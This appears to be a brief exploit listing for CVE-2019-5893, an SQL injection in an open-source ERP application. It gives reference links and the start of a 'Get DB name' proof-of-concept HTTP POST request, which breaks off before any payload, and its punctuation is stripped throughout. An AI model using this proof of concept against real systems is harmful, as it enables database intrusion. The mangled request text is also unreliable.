CVE-2019-5893 | OpenSource ERP application has SQL Injection vulnerability.
OpenSource-ERP-SQL-Injection
OpenSource ERP application has SQL Injection vulnerability
CVE-2019-5893
cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2019-5893
wwwexploit-dbcom/exploits/46118
PoC - Get DB name
POST /db/utils/query/dataxml HTTP/11
User-Agent: Mozilla/50 (Windows NT 63; WOW64) AppleWebKit/53736 (KHTML, like Gecko) Chrome/540284099 Safari/537